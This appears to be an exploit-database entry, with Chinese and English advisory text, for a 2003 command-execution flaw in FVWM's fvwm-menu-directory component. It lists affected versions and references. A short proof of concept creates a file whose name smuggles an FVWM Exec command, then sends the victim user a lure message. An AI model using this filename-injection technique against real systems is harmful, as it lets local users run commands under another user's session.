https://www.exploit-db.com/exploits/23414
https://www.securityfocus.com/bid/78293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-287

FVWM是一款XWindow的窗口管理程序。FVWM包含的fvwm-menu-directory组件不充分过滤用户提供的转义序列字符输入，本地攻击者可以利用这个漏洞以写目录权限执行任意命令。目前没有详细漏洞细节提供。

source: http://www.securityfocus.com/bid/9161/info

It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands.

FVWM versions 2.14.17 and 2.5.8 have been reported to be vulnerable to this issue, however other versions may be affected as well. 

$ touch '
> Exec xmessage "0wn3d"
>
> '
$ write fvwmguy <<< "k3wl mp3 in `pwd` OMG LOLOLOL!!!1111"

FVWM FVWM 2.5.8

FVWM FVWM 2.4.17

来源:BID
名称:9161
链接:http://www.securityfocus.com/bid/9161
来源:www.fvwm.org
链接:http://www.fvwm.org/news/
来源：NSFOCUS
名称：5760
链接：http://www.nsfocus.net/vulndb/5760